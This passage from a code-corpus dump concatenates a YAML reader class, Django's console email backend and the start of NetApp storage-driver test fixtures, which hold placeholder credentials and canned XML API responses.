    def __init__(self, name, position, character, encoding, reason):
        self.name = name
        self.character = character
        self.position = position
        self.encoding = encoding
        self.reason = reason

    def __str__(self):
        # A bytes character means the raw stream failed to decode;
        # otherwise the decoded text contained a non-printable character.
        if isinstance(self.character, bytes):
            return (
                "'%s' codec can't decode byte #x%02x: %s\n"
                " in \"%s\", position %d"
                % (self.encoding, ord(self.character), self.reason,
                   self.name, self.position)
            )
        return (
            "unacceptable character #x%04x: %s\n"
            " in \"%s\", position %d"
            % (self.character, self.reason,
               self.name, self.position)
        )
class Reader(object):
    # Reader:
    # - determines the data encoding and converts it to a unicode string,
    # - checks if characters are in allowed range,
    # - adds '\0' to the end.

    # Reader accepts
    #  - a `bytes` object,
    #  - a `str` object,
    #  - a file-like object with its `read` method returning `str`,
    #  - a file-like object with its `read` method returning `unicode`.

    # Yeah, it's ugly and slow.

    def __init__(self, stream):
        """Wrap `stream` (str, bytes, or file-like) for character-wise reading."""
        self.name = None
        self.stream = None
        # Number of raw bytes/chars consumed from the underlying stream so far.
        self.stream_pointer = 0
        self.eof = True
        # Decoded text buffer; `pointer` is the current offset within it.
        self.buffer = ''
        self.pointer = 0
        # Raw (possibly undecoded) data read from the stream but not yet
        # converted into `buffer`.
        self.raw_buffer = None
        self.raw_decode = None
        self.encoding = None
        # Absolute character index plus line/column, used for error marks.
        self.index = 0
        self.line = 0
        self.column = 0
        if isinstance(stream, str):
            self.name = "<unicode string>"
            self.check_printable(stream)
            # '\0' acts as an end-of-stream sentinel for the scanner.
            self.buffer = stream+'\0'
        elif isinstance(stream, bytes):
            self.name = "<byte string>"
            self.raw_buffer = stream
            self.determine_encoding()
        else:
            self.stream = stream
            self.name = getattr(stream, 'name', "<file>")
            self.eof = False
            self.raw_buffer = None
            self.determine_encoding()

    def peek(self, index=0):
        """Return the character `index` positions ahead without consuming it."""
        try:
            return self.buffer[self.pointer+index]
        except IndexError:
            # Buffer too short: decode more input, then retry.
            self.update(index+1)
            return self.buffer[self.pointer+index]

    def prefix(self, length=1):
        """Return the next `length` characters without consuming them."""
        if self.pointer+length >= len(self.buffer):
            self.update(length)
        return self.buffer[self.pointer:self.pointer+length]

    def forward(self, length=1):
        """Consume `length` characters, maintaining index/line/column counters."""
        if self.pointer+length+1 >= len(self.buffer):
            self.update(length+1)
        while length:
            ch = self.buffer[self.pointer]
            self.pointer += 1
            self.index += 1
            # Line breaks: LF, NEL, LS, PS, or a CR not followed by LF
            # (CRLF counts as a single break when the LF is seen).
            if ch in '\n\x85\u2028\u2029' \
                    or (ch == '\r' and self.buffer[self.pointer] != '\n'):
                self.line += 1
                self.column = 0
            elif ch != '\uFEFF':
                # BOM/ZWNBSP does not advance the column.
                self.column += 1
            length -= 1

    def get_mark(self):
        """Return a Mark for the current position (with snippet if in-memory)."""
        if self.stream is None:
            return Mark(self.name, self.index, self.line, self.column,
                    self.buffer, self.pointer)
        else:
            # For file streams the surrounding text is not retained.
            return Mark(self.name, self.index, self.line, self.column,
                    None, None)

    def determine_encoding(self):
        """Pick utf-16-le/utf-16-be/utf-8 by inspecting a BOM, then decode."""
        # Need at least two bytes to recognize a UTF-16 BOM.
        while not self.eof and (self.raw_buffer is None or len(self.raw_buffer) < 2):
            self.update_raw()
        if isinstance(self.raw_buffer, bytes):
            if self.raw_buffer.startswith(codecs.BOM_UTF16_LE):
                self.raw_decode = codecs.utf_16_le_decode
                self.encoding = 'utf-16-le'
            elif self.raw_buffer.startswith(codecs.BOM_UTF16_BE):
                self.raw_decode = codecs.utf_16_be_decode
                self.encoding = 'utf-16-be'
            else:
                # No BOM: YAML defaults to UTF-8.
                self.raw_decode = codecs.utf_8_decode
                self.encoding = 'utf-8'
        self.update(1)

    # Matches any character not allowed in a YAML stream (C0 controls other
    # than tab/LF/CR, DEL range, surrogates, and U+FFFE/U+FFFF).
    NON_PRINTABLE = re.compile('[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\uD7FF\uE000-\uFFFD]')
    def check_printable(self, data):
        """Raise ReaderError if `data` contains a disallowed character."""
        match = self.NON_PRINTABLE.search(data)
        if match:
            character = match.group()
            position = self.index+(len(self.buffer)-self.pointer)+match.start()
            raise ReaderError(self.name, position, ord(character),
                    'unicode', "special characters are not allowed")

    def update(self, length):
        """Ensure at least `length` characters are available past `pointer`."""
        if self.raw_buffer is None:
            return
        # Discard already-consumed characters before extending the buffer.
        self.buffer = self.buffer[self.pointer:]
        self.pointer = 0
        while len(self.buffer) < length:
            if not self.eof:
                self.update_raw()
            if self.raw_decode is not None:
                try:
                    # Incremental decode: only flag errors at EOF, since a
                    # truncated multi-byte sequence may complete later.
                    data, converted = self.raw_decode(self.raw_buffer,
                            'strict', self.eof)
                except UnicodeDecodeError as exc:
                    character = self.raw_buffer[exc.start]
                    if self.stream is not None:
                        position = self.stream_pointer-len(self.raw_buffer)+exc.start
                    else:
                        position = exc.start
                    raise ReaderError(self.name, position, character,
                            exc.encoding, exc.reason)
            else:
                data = self.raw_buffer
                converted = len(data)
            self.check_printable(data)
            self.buffer += data
            # Keep only the raw bytes the decoder could not consume yet.
            self.raw_buffer = self.raw_buffer[converted:]
            if self.eof:
                # Append the end-of-stream sentinel exactly once.
                self.buffer += '\0'
                self.raw_buffer = None
                break

    def update_raw(self, size=4096):
        """Read up to `size` units from the stream into `raw_buffer`."""
        data = self.stream.read(size)
        if self.raw_buffer is None:
            self.raw_buffer = data
        else:
            self.raw_buffer += data
        self.stream_pointer += len(data)
        if not data:
            # Empty read signals end of stream.
            self.eof = True
#try:
# import psyco
# psyco.bind(Reader)
#except ImportError:
# pass
| apache-2.0 |
beni55/django | django/core/mail/backends/console.py | 696 | 1477 | """
Email backend that writes messages to console instead of sending them.
"""
import sys
import threading
from django.core.mail.backends.base import BaseEmailBackend
from django.utils import six
class EmailBackend(BaseEmailBackend):
    """Email backend that dumps each message to a stream (stdout by default)."""

    def __init__(self, *args, **kwargs):
        self.stream = kwargs.pop('stream', sys.stdout)
        self._lock = threading.RLock()
        super(EmailBackend, self).__init__(*args, **kwargs)

    def write_message(self, message):
        """Serialize one email message to the stream, followed by a divider."""
        msg = message.message()
        msg_data = msg.as_bytes()
        if six.PY3:
            # On Python 3 the stream expects text, so decode using the
            # message's charset, falling back to UTF-8.
            charset = 'utf-8'
            if msg.get_charset():
                charset = msg.get_charset().get_output_charset()
            msg_data = msg_data.decode(charset)
        self.stream.write('%s\n' % msg_data)
        self.stream.write('-' * 79)
        self.stream.write('\n')

    def send_messages(self, email_messages):
        """Write all messages to the stream in a thread-safe way."""
        if not email_messages:
            return
        written = 0
        with self._lock:
            try:
                stream_created = self.open()
                for message in email_messages:
                    self.write_message(message)
                    self.stream.flush()  # flush after each message
                    written += 1
                if stream_created:
                    self.close()
            except Exception:
                if not self.fail_silently:
                    raise
        return written
| bsd-3-clause |
bswartz/manila | manila/tests/share/drivers/netapp/dataontap/client/fakes.py | 1 | 86084 | # Copyright (c) 2015 Clinton Knight. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import mock
from six.moves import urllib
from manila.share.drivers.netapp.dataontap.client import api
# Connection parameters handed to the NetApp client under test.
CONNECTION_INFO = {
    'hostname': 'hostname',
    'transport_type': 'https',
    'port': 443,
    'username': 'admin',
    'password': 'passw0rd',
    'api_trace_pattern': '(.*)',
}
# Cluster / node / vserver topology identifiers used across the fixtures.
CLUSTER_NAME = 'fake_cluster'
REMOTE_CLUSTER_NAME = 'fake_cluster_2'
CLUSTER_ADDRESS_1 = 'fake_cluster_address'
CLUSTER_ADDRESS_2 = 'fake_cluster_address_2'
VERSION = 'NetApp Release 8.2.1 Cluster-Mode: Fri Mar 21 14:25:07 PDT 2014'
VERSION_NO_DARE = 'NetApp Release 9.1.0: Tue May 10 19:30:23 2016 <1no-DARE>'
VERSION_TUPLE = (9, 1, 0)
NODE_NAME = 'fake_node1'
NODE_NAMES = ('fake_node1', 'fake_node2')
VSERVER_NAME = 'fake_vserver'
VSERVER_NAME_2 = 'fake_vserver_2'
ADMIN_VSERVER_NAME = 'fake_admin_vserver'
NODE_VSERVER_NAME = 'fake_node_vserver'
NFS_VERSIONS = ['nfs3', 'nfs4.0']
# Aggregate / volume / share naming fixtures.
ROOT_AGGREGATE_NAMES = ('root_aggr1', 'root_aggr2')
ROOT_VOLUME_AGGREGATE_NAME = 'fake_root_aggr'
ROOT_VOLUME_NAME = 'fake_root_volume'
SHARE_AGGREGATE_NAME = 'fake_aggr1'
SHARE_AGGREGATE_NAMES = ('fake_aggr1', 'fake_aggr2')
SHARE_AGGREGATE_RAID_TYPES = ('raid4', 'raid_dp')
SHARE_AGGREGATE_DISK_TYPE = 'FCAL'
SHARE_AGGREGATE_DISK_TYPES = ['SATA', 'SSD']
SHARE_NAME = 'fake_share'
SHARE_SIZE = '1000000000'
SHARE_NAME_2 = 'fake_share_2'
SNAPSHOT_NAME = 'fake_snapshot'
CG_SNAPSHOT_ID = 'fake_cg_id'
PARENT_SHARE_NAME = 'fake_parent_share'
PARENT_SNAPSHOT_NAME = 'fake_parent_snapshot'
MAX_FILES = 5000
LANGUAGE = 'fake_language'
SNAPSHOT_POLICY_NAME = 'fake_snapshot_policy'
EXPORT_POLICY_NAME = 'fake_export_policy'
# Maps vserver name -> export policies expected to be garbage-collected.
DELETED_EXPORT_POLICIES = {
    VSERVER_NAME: [
        'deleted_manila_fake_policy_1',
        'deleted_manila_fake_policy_2',
    ],
    VSERVER_NAME_2: [
        'deleted_manila_fake_policy_3',
    ],
}
QOS_POLICY_GROUP_NAME = 'fake_qos_policy_group_name'
QOS_MAX_THROUGHPUT = '5000B/s'
USER_NAME = 'fake_user'
# Networking fixtures: physical port, VLAN, LIF addressing.
PORT = 'e0a'
VLAN = '1001'
VLAN_PORT = 'e0a-1001'
IP_ADDRESS = '10.10.10.10'
NETMASK = '255.255.255.0'
GATEWAY = '10.10.10.1'
SUBNET = '10.10.10.0/24'
NET_ALLOCATION_ID = 'fake_allocation_id'
LIF_NAME_TEMPLATE = 'os_%(net_allocation_id)s'
LIF_NAME = LIF_NAME_TEMPLATE % {'net_allocation_id': NET_ALLOCATION_ID}
IPSPACE_NAME = 'fake_ipspace'
BROADCAST_DOMAIN = 'fake_domain'
MTU = 9000
# SnapMirror source/destination endpoints.
SM_SOURCE_VSERVER = 'fake_source_vserver'
SM_SOURCE_VOLUME = 'fake_source_volume'
SM_DEST_VSERVER = 'fake_destination_vserver'
SM_DEST_VOLUME = 'fake_destination_volume'
# Expected parsed form of a single data LIF.
NETWORK_INTERFACES = [{
    'interface_name': 'fake_interface',
    'address': IP_ADDRESS,
    'vserver': VSERVER_NAME,
    'netmask': NETMASK,
    'role': 'data',
    'home-node': NODE_NAME,
    'home-port': VLAN_PORT
}]
# Expected parsed form of multiple data LIFs (VLAN port and bare port).
NETWORK_INTERFACES_MULTIPLE = [
    {
        'interface_name': 'fake_interface',
        'address': IP_ADDRESS,
        'vserver': VSERVER_NAME,
        'netmask': NETMASK,
        'role': 'data',
        'home-node': NODE_NAME,
        'home-port': VLAN_PORT,
    },
    {
        'interface_name': 'fake_interface_2',
        'address': '10.10.12.10',
        'vserver': VSERVER_NAME,
        'netmask': NETMASK,
        'role': 'data',
        'home-node': NODE_NAME,
        'home-port': PORT,
    }
]
# Expected parsed form of an ipspace record.
IPSPACES = [{
    'uuid': 'fake_uuid',
    'ipspace': IPSPACE_NAME,
    'id': 'fake_id',
    'broadcast-domains': ['OpenStack'],
    'ports': [NODE_NAME + ':' + VLAN_PORT],
    'vservers': [
        IPSPACE_NAME,
        VSERVER_NAME,
    ]
}]
# Payload for an EMS (autosupport/event) log message.
EMS_MESSAGE = {
    'computer-name': 'fake_host',
    'event-id': '0',
    'event-source': 'fake driver',
    'app-version': 'fake app version',
    'category': 'fake category',
    'event-description': 'fake description',
    'log-level': '6',
    'auto-support': 'false',
}
# Expected parsed form of a QoS policy group record.
QOS_POLICY_GROUP = {
    'policy-group': QOS_POLICY_GROUP_NAME,
    'vserver': VSERVER_NAME,
    'max-throughput': QOS_MAX_THROUGHPUT,
    'num-workloads': 1,
}
# Generic canned ZAPI responses shared by many client tests below.
# Empty result set.
NO_RECORDS_RESPONSE = etree.XML("""
<results status="passed">
<num-records>0</num-records>
</results>
""")
# Bare success with no payload.
PASSED_RESPONSE = etree.XML("""
<results status="passed" />
""")
# Success counters for a bulk (iter) operation.
PASSED_FAILED_ITER_RESPONSE = etree.XML("""
<results status="passed">
<num-failed>0</num-failed>
<num-succeeded>1</num-succeeded>
</results>
""")
# Malformed iter responses used to exercise client error handling:
# records claimed but no attributes-list element present.
INVALID_GET_ITER_RESPONSE_NO_ATTRIBUTES = etree.XML("""
<results status="passed">
<num-records>1</num-records>
<next-tag>fake_tag</next-tag>
</results>
""")
# attributes-list present but num-records element missing.
INVALID_GET_ITER_RESPONSE_NO_RECORDS = etree.XML("""
<results status="passed">
<attributes-list/>
<next-tag>fake_tag</next-tag>
</results>
""")
# vserver-get-iter: single vserver listed by name.
VSERVER_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-info>
<vserver-name>%(fake_vserver)s</vserver-name>
</vserver-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'fake_vserver': VSERVER_NAME})
# vserver-get-iter restricted to the root-volume attribute.
VSERVER_GET_ROOT_VOLUME_NAME_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-info>
<root-volume>%(root_volume)s</root-volume>
<vserver-name>%(fake_vserver)s</vserver-name>
</vserver-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'root_volume': ROOT_VOLUME_NAME, 'fake_vserver': VSERVER_NAME})
# vserver-get-iter restricted to the ipspace attribute.
VSERVER_GET_IPSPACE_NAME_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-info>
<ipspace>%(ipspace)s</ipspace>
<vserver-name>%(fake_vserver)s</vserver-name>
</vserver-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'ipspace': IPSPACE_NAME, 'fake_vserver': VSERVER_NAME})
# vserver-get: vserver with two aggregates and per-aggregate free space.
VSERVER_GET_RESPONSE = etree.XML("""
<results status="passed">
<attributes>
<vserver-info>
<aggr-list>
<aggr-name>%(aggr1)s</aggr-name>
<aggr-name>%(aggr2)s</aggr-name>
</aggr-list>
<vserver-aggr-info-list>
<vserver-aggr-info>
<aggr-availsize>45678592</aggr-availsize>
<aggr-name>%(aggr1)s</aggr-name>
</vserver-aggr-info>
<vserver-aggr-info>
<aggr-availsize>6448431104</aggr-availsize>
<aggr-name>%(aggr2)s</aggr-name>
</vserver-aggr-info>
</vserver-aggr-info-list>
<vserver-name>%(vserver)s</vserver-name>
</vserver-info>
</attributes>
</results>
""" % {
    'vserver': VSERVER_NAME,
    'aggr1': SHARE_AGGREGATE_NAMES[0],
    'aggr2': SHARE_AGGREGATE_NAMES[1],
})
# vserver-get-iter filtered to data vservers.
VSERVER_DATA_LIST_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-info>
<vserver-name>%(vserver)s</vserver-name>
<vserver-type>data</vserver-type>
</vserver-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'vserver': VSERVER_NAME})
# Expected parsed form of VSERVER_GET_RESPONSE's aggregate availability.
VSERVER_AGGREGATES = {
    SHARE_AGGREGATE_NAMES[0]: {
        'available': 45678592,
    },
    SHARE_AGGREGATE_NAMES[1]: {
        'available': 6448431104,
    },
}
# vserver-get where the vserver has no aggregates assigned.
VSERVER_GET_RESPONSE_NO_AGGREGATES = etree.XML("""
<results status="passed">
<attributes>
<vserver-info>
<vserver-name>%(vserver)s</vserver-name>
</vserver-info>
</attributes>
</results>
""" % {'vserver': VSERVER_NAME})
ONTAPI_VERSION_RESPONSE = etree.XML("""
<results status="passed">
<major-version>1</major-version>
<minor-version>19</minor-version>
</results>
""")
SYSTEM_GET_VERSION_RESPONSE = etree.XML("""
<results status="passed">
<build-timestamp>1395426307</build-timestamp>
<is-clustered>true</is-clustered>
<version>%(version)s</version>
<version-tuple>
<system-version-tuple>
<generation>8</generation>
<major>2</major>
<minor>1</minor>
</system-version-tuple>
</version-tuple>
</results>
""" % {'version': VERSION})
LICENSE_V2_LIST_INFO_RESPONSE = etree.XML("""
<results status="passed">
<licenses>
<license-v2-info>
<customer-id>none</customer-id>
<description>Cluster Base License</description>
<legacy>false</legacy>
<owner>cluster3</owner>
<package>base</package>
<serial-number>1-80-000008</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>NFS License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>nfs</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>CIFS License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>cifs</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>iSCSI License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>iscsi</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>FCP License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>fcp</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>SnapRestore License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>snaprestore</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>SnapMirror License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>snapmirror</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>FlexClone License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>flexclone</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>SnapVault License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>snapvault</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
</licenses>
</results>
""")
LICENSES = (
'base', 'cifs', 'fcp', 'flexclone', 'iscsi', 'nfs', 'snapmirror',
'snaprestore', 'snapvault'
)
VOLUME_COUNT_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>vol0</name>
<owning-vserver-name>cluster3-01</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
<volume-attributes>
<volume-id-attributes>
<name>%(root_volume)s</name>
<owning-vserver-name>%(fake_vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {'root_volume': ROOT_VOLUME_NAME, 'fake_vserver': VSERVER_NAME})
CIFS_SECURITY_SERVICE = {
'type': 'active_directory',
'password': 'fake_password',
'user': 'fake_user',
'domain': 'fake_domain',
'dns_ip': 'fake_dns_ip',
}
LDAP_SECURITY_SERVICE = {
'type': 'ldap',
'password': 'fake_password',
'server': 'fake_server',
'id': 'fake_id',
}
KERBEROS_SECURITY_SERVICE = {
'type': 'kerberos',
'password': 'fake_password',
'user': 'fake_user',
'server': 'fake_server',
'id': 'fake_id',
'domain': 'fake_domain',
'dns_ip': 'fake_dns_ip',
}
KERBEROS_SERVICE_PRINCIPAL_NAME = 'nfs/fake-vserver.fake_domain@FAKE_DOMAIN'
INVALID_SECURITY_SERVICE = {
'type': 'fake',
}
SYSTEM_NODE_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<node-details-info>
<node>%s</node>
</node-details-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % NODE_NAME)
SECUTITY_KEY_MANAGER_NVE_SUPPORT_RESPONSE_TRUE = etree.XML("""
<results status="passed">
<vol-encryption-supported>true</vol-encryption-supported>
</results>
""")
SECUTITY_KEY_MANAGER_NVE_SUPPORT_RESPONSE_FALSE = etree.XML("""
<results status="passed">
<vol-encryption-supported>false</vol-encryption-supported>
</results>
""")
NET_PORT_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-port-info>
<administrative-duplex>full</administrative-duplex>
<administrative-flowcontrol>full</administrative-flowcontrol>
<administrative-speed>auto</administrative-speed>
<is-administrative-auto-negotiate>true</is-administrative-auto-negotiate>
<is-administrative-up>true</is-administrative-up>
<is-operational-auto-negotiate>true</is-operational-auto-negotiate>
<link-status>up</link-status>
<mac-address>00:0c:29:fc:04:d9</mac-address>
<mtu>1500</mtu>
<node>%(node_name)s</node>
<operational-duplex>full</operational-duplex>
<operational-flowcontrol>none</operational-flowcontrol>
<operational-speed>10</operational-speed>
<port>e0a</port>
<port-type>physical</port-type>
<role>data</role>
</net-port-info>
<net-port-info>
<administrative-duplex>full</administrative-duplex>
<administrative-flowcontrol>full</administrative-flowcontrol>
<administrative-speed>auto</administrative-speed>
<is-administrative-auto-negotiate>true</is-administrative-auto-negotiate>
<is-administrative-up>true</is-administrative-up>
<is-operational-auto-negotiate>true</is-operational-auto-negotiate>
<link-status>up</link-status>
<mac-address>00:0c:29:fc:04:e3</mac-address>
<mtu>1500</mtu>
<node>%(node_name)s</node>
<operational-duplex>full</operational-duplex>
<operational-flowcontrol>none</operational-flowcontrol>
<operational-speed>100</operational-speed>
<port>e0b</port>
<port-type>physical</port-type>
<role>data</role>
</net-port-info>
<net-port-info>
<administrative-duplex>full</administrative-duplex>
<administrative-flowcontrol>full</administrative-flowcontrol>
<administrative-speed>auto</administrative-speed>
<is-administrative-auto-negotiate>true</is-administrative-auto-negotiate>
<is-administrative-up>true</is-administrative-up>
<is-operational-auto-negotiate>true</is-operational-auto-negotiate>
<link-status>up</link-status>
<mac-address>00:0c:29:fc:04:ed</mac-address>
<mtu>1500</mtu>
<node>%(node_name)s</node>
<operational-duplex>full</operational-duplex>
<operational-flowcontrol>none</operational-flowcontrol>
<operational-speed>1000</operational-speed>
<port>e0c</port>
<port-type>physical</port-type>
<role>data</role>
</net-port-info>
<net-port-info>
<administrative-duplex>full</administrative-duplex>
<administrative-flowcontrol>full</administrative-flowcontrol>
<administrative-speed>auto</administrative-speed>
<is-administrative-auto-negotiate>true</is-administrative-auto-negotiate>
<is-administrative-up>true</is-administrative-up>
<is-operational-auto-negotiate>true</is-operational-auto-negotiate>
<link-status>up</link-status>
<mac-address>00:0c:29:fc:04:f7</mac-address>
<mtu>1500</mtu>
<node>%(node_name)s</node>
<operational-duplex>full</operational-duplex>
<operational-flowcontrol>none</operational-flowcontrol>
<operational-speed>10000</operational-speed>
<port>e0d</port>
<port-type>physical</port-type>
<role>data</role>
</net-port-info>
</attributes-list>
<num-records>4</num-records>
</results>
""" % {'node_name': NODE_NAME})
SPEED_SORTED_PORTS = (
{'node': NODE_NAME, 'port': 'e0d', 'speed': '10000'},
{'node': NODE_NAME, 'port': 'e0c', 'speed': '1000'},
{'node': NODE_NAME, 'port': 'e0b', 'speed': '100'},
{'node': NODE_NAME, 'port': 'e0a', 'speed': '10'},
)
PORT_NAMES = ('e0a', 'e0b', 'e0c', 'e0d')
SPEED_SORTED_PORT_NAMES = ('e0d', 'e0c', 'e0b', 'e0a')
UNSORTED_PORTS_ALL_SPEEDS = (
{'node': NODE_NAME, 'port': 'port6', 'speed': 'undef'},
{'node': NODE_NAME, 'port': 'port3', 'speed': '100'},
{'node': NODE_NAME, 'port': 'port1', 'speed': '10000'},
{'node': NODE_NAME, 'port': 'port4', 'speed': '10'},
{'node': NODE_NAME, 'port': 'port7'},
{'node': NODE_NAME, 'port': 'port2', 'speed': '1000'},
{'node': NODE_NAME, 'port': 'port5', 'speed': 'auto'},
)
SORTED_PORTS_ALL_SPEEDS = (
{'node': NODE_NAME, 'port': 'port1', 'speed': '10000'},
{'node': NODE_NAME, 'port': 'port2', 'speed': '1000'},
{'node': NODE_NAME, 'port': 'port3', 'speed': '100'},
{'node': NODE_NAME, 'port': 'port4', 'speed': '10'},
{'node': NODE_NAME, 'port': 'port5', 'speed': 'auto'},
{'node': NODE_NAME, 'port': 'port6', 'speed': 'undef'},
{'node': NODE_NAME, 'port': 'port7'},
)
NET_PORT_GET_ITER_BROADCAST_DOMAIN_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-port-info>
<ipspace>%(ipspace)s</ipspace>
<broadcast-domain>%(domain)s</broadcast-domain>
<node>%(node)s</node>
<port>%(port)s</port>
</net-port-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'domain': BROADCAST_DOMAIN,
'node': NODE_NAME,
'port': PORT,
'ipspace': IPSPACE_NAME,
})
NET_PORT_GET_ITER_BROADCAST_DOMAIN_MISSING_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-port-info>
<ipspace>%(ipspace)s</ipspace>
<node>%(node)s</node>
<port>%(port)s</port>
</net-port-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'node': NODE_NAME, 'port': PORT, 'ipspace': IPSPACE_NAME})
NET_PORT_BROADCAST_DOMAIN_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-port-broadcast-domain-info>
<broadcast-domain>%(domain)s</broadcast-domain>
<ipspace>%(ipspace)s</ipspace>
</net-port-broadcast-domain-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'domain': BROADCAST_DOMAIN, 'ipspace': IPSPACE_NAME})
NET_IPSPACES_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-ipspaces-info>
<broadcast-domains>
<broadcast-domain-name>OpenStack</broadcast-domain-name>
</broadcast-domains>
<id>fake_id</id>
<ipspace>%(ipspace)s</ipspace>
<ports>
<net-qualified-port-name>%(node)s:%(port)s</net-qualified-port-name>
</ports>
<uuid>fake_uuid</uuid>
<vservers>
<vserver-name>%(ipspace)s</vserver-name>
<vserver-name>%(vserver)s</vserver-name>
</vservers>
</net-ipspaces-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'ipspace': IPSPACE_NAME,
'node': NODE_NAME,
'port': VLAN_PORT,
'vserver': VSERVER_NAME
})
NET_INTERFACE_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-interface-info>
<address>192.168.228.42</address>
<address-family>ipv4</address-family>
<administrative-status>up</administrative-status>
<current-node>%(node)s</current-node>
<current-port>e0c</current-port>
<data-protocols>
<data-protocol>none</data-protocol>
</data-protocols>
<dns-domain-name>none</dns-domain-name>
<failover-group>system-defined</failover-group>
<failover-policy>disabled</failover-policy>
<firewall-policy>mgmt</firewall-policy>
<home-node>%(node)s</home-node>
<home-port>e0c</home-port>
<interface-name>cluster_mgmt</interface-name>
<is-auto-revert>true</is-auto-revert>
<is-home>true</is-home>
<lif-uuid>d3230112-7524-11e4-8608-123478563412</lif-uuid>
<listen-for-dns-query>false</listen-for-dns-query>
<netmask>%(netmask)s</netmask>
<netmask-length>24</netmask-length>
<operational-status>up</operational-status>
<role>cluster_mgmt</role>
<routing-group-name>c192.168.228.0/24</routing-group-name>
<use-failover-group>system_defined</use-failover-group>
<vserver>cluster3</vserver>
</net-interface-info>
<net-interface-info>
<address>192.168.228.43</address>
<address-family>ipv4</address-family>
<administrative-status>up</administrative-status>
<current-node>%(node)s</current-node>
<current-port>e0d</current-port>
<dns-domain-name>none</dns-domain-name>
<failover-group>system-defined</failover-group>
<failover-policy>nextavail</failover-policy>
<firewall-policy>mgmt</firewall-policy>
<home-node>%(node)s</home-node>
<home-port>e0d</home-port>
<interface-name>mgmt1</interface-name>
<is-auto-revert>true</is-auto-revert>
<is-home>true</is-home>
<lif-uuid>0ccc57cc-7525-11e4-8608-123478563412</lif-uuid>
<listen-for-dns-query>false</listen-for-dns-query>
<netmask>%(netmask)s</netmask>
<netmask-length>24</netmask-length>
<operational-status>up</operational-status>
<role>node_mgmt</role>
<routing-group-name>n192.168.228.0/24</routing-group-name>
<use-failover-group>system_defined</use-failover-group>
<vserver>cluster3-01</vserver>
</net-interface-info>
<net-interface-info>
<address>%(address)s</address>
<address-family>ipv4</address-family>
<administrative-status>up</administrative-status>
<current-node>%(node)s</current-node>
<current-port>%(vlan)s</current-port>
<data-protocols>
<data-protocol>nfs</data-protocol>
<data-protocol>cifs</data-protocol>
</data-protocols>
<dns-domain-name>none</dns-domain-name>
<failover-group>system-defined</failover-group>
<failover-policy>nextavail</failover-policy>
<firewall-policy>data</firewall-policy>
<home-node>%(node)s</home-node>
<home-port>%(vlan)s</home-port>
<interface-name>%(lif)s</interface-name>
<is-auto-revert>false</is-auto-revert>
<is-home>true</is-home>
<lif-uuid>db4d91b6-95d9-11e4-8608-123478563412</lif-uuid>
<listen-for-dns-query>false</listen-for-dns-query>
<netmask>%(netmask)s</netmask>
<netmask-length>24</netmask-length>
<operational-status>up</operational-status>
<role>data</role>
<routing-group-name>d10.0.0.0/24</routing-group-name>
<use-failover-group>system_defined</use-failover-group>
<vserver>%(vserver)s</vserver>
</net-interface-info>
</attributes-list>
<num-records>3</num-records>
</results>
""" % {
'lif': LIF_NAME,
'vserver': VSERVER_NAME,
